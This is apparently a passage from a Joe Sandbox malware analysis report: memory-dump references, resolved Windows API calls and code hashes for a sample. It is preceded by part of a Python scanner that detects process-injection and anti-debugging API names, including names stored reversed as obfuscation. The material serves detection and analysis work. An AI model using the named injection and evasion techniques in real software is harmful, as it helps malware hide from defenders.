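    "IsDebuggerPresent",
    "GetDiskFreeSpaceExA",
    "CheckRemoteDebuggerPresent",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "QueueUserAPC",
)

# Identifier-shaped byte runs; Win32 export names are plain ASCII identifiers,
# so anything shorter than 6 characters is ignored to cut noise.
_TOKEN = re.compile(rb"[A-Za-z0-9_]{6,}")

Finding = Tuple[int, str, str]  # (offset in blob, "plain" | "reversed", API name)


def scan(blob: bytes) -> List[Finding]:
    """Return every watched API name found in blob, forward or mirrored."""
    findings: List[Finding] = []
    for m in _TOKEN.finditer(blob):
        token = m.group().decode("ascii")
        mirrored = token[::-1]
        for api in WATCHED_APIS:
            if api in token:
                findings.append((m.start(), "plain", api))
            elif api in mirrored:
                # Stored backwards: invisible to a forward string match, but the
                # loader only has to reverse the buffer before GetProcAddress
                # (assumption about the sample's intent, based on the strings).
                findings.append((m.start(), "reversed", api))
    return findings


def reversed_names(blob: bytes) -> List[str]:
    """Only the names stored reversed; the stronger obfuscation signal."""
    return [api for _, kind, api in scan(blob) if kind == "reversed"]


# Constructed sample region, not a real dump. The first three strings echo the
# records above; "sserddAcorPteG" (GetProcAddress reversed) is made up here.
SAMPLE_DUMP = (
    b"\x00\x00KernelBASE\x00AeldnaHeludoMteG\x00"
    b"\x90\x90KernelBase\x00IsDebuggerPresent\x00"
    b"kernel32.dll\x00GetDiskFreeSpaceExA\x00"
    b"sserddAcorPteG\x00"
    b"\xff\xfe\x00padding\x00"
)

if __name__ == "__main__":
    for offset, kind, api in scan(SAMPLE_DUMP):
        print(f"0x{offset:04x}  {kind:8s}  {api}")
```

To use it on the report's own material, read one of the `.sdmp` regions listed under "Memory Dump Source" into `blob` and call `scan(blob)`; a reversed hit is a good seed for a YARA rule that matches the mirrored spelling rather than the forward one.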
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                                        • Instruction ID: 9d6461140b8e7ac1a158c94294cfc4d3c7e006038b4106bd3c7f59f76f2c50ba
                                                                                                                        • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                                                        • Instruction Fuzzy Hash: C8C15C719002459FDB64DF78DC40BA9BBB9EF45314F16416ADA8897BE0E7308E41CB6C
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                                                                                        • Instruction ID: f9c883659db0cbd967afeb4695ed59d8789b61336555ff3baeb941dd068af22c
                                                                                                                        • Opcode Fuzzy Hash: 34a4a8fdb2fbaed24085f9f51e48c21e05a0faa9b4c0d03c29d10533be22c836
                                                                                                                        • Instruction Fuzzy Hash: A2A167729847869FDB22CF58C8D07AEBBE5EF15318F18916DE4859B2C1D33889C2CB54
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                                                        • Instruction ID: cada6a20df4e083fd0ef95abf4024e34e6bb2e4561f158344ef2198461cd48ab
                                                                                                                        • Opcode Fuzzy Hash: b50f87e948356266a42ac280b2451f101745a062afa0556d4abdae292072cfe6
                                                                                                                        • Instruction Fuzzy Hash: FBC1BF70D442499BDF15DFA8CCC8BADBBF5AF0A314F049196EA14A73D1C7308982CB65
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6cf563653d4af7fa13662feff9878e6b3d813d0a121b78138781980ce1d9de76
                                                                                                                        • Instruction ID: 57f765afbf06a85c303f3de858e0ddd19f6cff8433a94bfa66393e6116a86743
                                                                                                                        • Opcode Fuzzy Hash: 6cf563653d4af7fa13662feff9878e6b3d813d0a121b78138781980ce1d9de76
                                                                                                                        • Instruction Fuzzy Hash: 9541F771E00304AFD7249F78CC50BAABBA9EB88724F21862AE255DB780D771DD418B94
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D3E297
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D3E2B3
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D3E32A
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 02D3E353
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 920484758-0
                                                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                        • Instruction ID: e2e484100908545bb5f9022961810dbd12a99adf3ffd91b0db58a04e2ccddb00
                                                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                        • Instruction Fuzzy Hash: D941F879A012299BCB62DB58CD90BC9B3BDFF49314F0042D5E649A7352DA30AF81CF60
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D3AD59
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D3AD7D
                                                                                                                        • GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D3AD98
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D3AE2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        • Opcode ID: 4d08873c9e656c8284f1f66155cbef20762d61f8fd88804b594e82f47c9db8fc
                                                                                                                        • Instruction ID: 8fad48b0b06d5db2c5e39bd5a3f0e2aa899c30d1da657dba45619717d8e0b95c
                                                                                                                        • Opcode Fuzzy Hash: 4d08873c9e656c8284f1f66155cbef20762d61f8fd88804b594e82f47c9db8fc
                                                                                                                        • Instruction Fuzzy Hash: FC411B71A402589BDB62DB68DC84BDAB7FDEB08340F4440E6A588E7341DB749F84CFA4
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D3AD59
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D3AD7D
                                                                                                                        • GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D3AD98
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D3AE2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        • Opcode ID: 1fc83578641176beff838688dc3c104e67093cbb872688ddd107d20355a41d76
                                                                                                                        • Instruction ID: 491392e9e72bd286826fc66fe7b3f8f877ec24b401a1a730bcb1546dc7dee7ce
                                                                                                                        • Opcode Fuzzy Hash: 1fc83578641176beff838688dc3c104e67093cbb872688ddd107d20355a41d76
                                                                                                                        • Instruction Fuzzy Hash: 95411B70A402589BDB62DB68DC84BDAB7FDAB08341F4400E6A588E7341DB749F84CFA4
                                                                                                                        APIs
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02DEF3B2
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02DEF3CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426506684-0
                                                                                                                        • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                        • Instruction ID: 79fbe85908e9838094c53cc51e4b645efedd0a5d0c2bc67fe36e86d2611ca256
                                                                                                                        • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                        • Instruction Fuzzy Hash: 4B01D432119315AEEE6437797C84B672B4AFB01779F20023EF729867E2EF528C40D568
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 3519838083-1296849874
                                                                                                                        • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                                        • Instruction ID: c3078118a5255e0d9e6194cfa7e17d77942fa747c618f1f29635e7920a72fd34
                                                                                                                        • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                                        • Instruction Fuzzy Hash: C1511972900208EACB06FBA4DCB5AED777AEF11300F904159B94797690EF249F498FA1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp_wcslen
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 1846113162-1684325040
                                                                                                                        • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                        • Instruction ID: 8b6a0e0f73de7a13b777a22d2234d9ac92c2502cf60f66e50df1c3dc8fde7dff
                                                                                                                        • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                        • Instruction Fuzzy Hash: B3416275548706ABD720DFA0EC4CA9BB7ECFB44715F00093AF945C2262EB74DA48CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID: LG$XG
• API String ID: 0-1482930923
• Opcode ID: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
• Instruction ID: 7f3ca282342be6e7730739d30b0bd7bbb52eaf198c1dc66fe8a580ac14f7efef
• Opcode Fuzzy Hash: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
• Instruction Fuzzy Hash: 5231B775900705AFDF61EFA8D84079D77B5DB41329F10816AD81AAB3D0E7B4DD40CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: _strftime
• String ID: \=G$t=G
• API String ID: 1867682108-3587614975
• Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
• Instruction ID: 5aa2128500e8e3c1f7677576e26563fea809e16ab85f9ff2548d31ac1a7c2062
• Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
• Instruction Fuzzy Hash: 66313D31505381DBC315EF24DC75ADE77AAEF94310F408939A29A832B0EF709949CF6A
APIs
  • Part of subcall function 02DEAE35: __onexit.LIBCMT ref: 02DEAE3B
• __Init_thread_footer.LIBCMT ref: 02DC2437
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: Init_thread_footer__onexit
• String ID: ,]G$0]G
• API String ID: 1881088180-589576501
• Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
• Instruction ID: b4e6fc0814703a3a2f45ce811b30a78eb810b992857e904a036d1e9f7b373f51
• Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
• Instruction Fuzzy Hash: 6C218D31A0061A9BCB15FBA4D8A4AED7376EF50300F60442ADA47673D1EF746D4ACEA4
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6ff90cccddef8d184bac6c69ef60313b0c36356a638dbd310e44b3ec5349f92d
• Instruction ID: db24640ba3045def2927ed36c69c00c7e536d22f333b6a2546930e54dc394620
• Opcode Fuzzy Hash: 6ff90cccddef8d184bac6c69ef60313b0c36356a638dbd310e44b3ec5349f92d
• Instruction Fuzzy Hash: BFA1F5A77106024BD71AAA7CEC903ADB3D2DBC5325F18827EE11DCB381EB64CD46C660
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D395DA), ref: 02D39572
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D395DA), ref: 02D39578
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: fc9e65abf2907760376744114d0d2b6da99809ddf990ea7ab5066061c7e724bf
• Instruction ID: c00453038dce1ead7c8c454b78fb480b82f3e0100bb65083f692aa83d7a61c23
• Opcode Fuzzy Hash: fc9e65abf2907760376744114d0d2b6da99809ddf990ea7ab5066061c7e724bf
• Instruction Fuzzy Hash: D5218172A042589FDB12DFA8C891AEEB3B9EF09710F5140A5E845E7350D774DE80CFA5
APIs
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
  • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
  • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
  • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D483C2), ref: 02D483A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: HandleModule$AddressProc$CacheFlushInstruction
• String ID: FlushInstructionCache$Kernel32
• API String ID: 3811539418-184458249
• Opcode ID: dd7b4757b97bf688166755cfe30f3dfbd164df628d99ed34b4bcee6c45f51314
• Instruction ID: 9263d0a67a8e84638f6725ac3ab9378272a415be832781c6028685969553da52
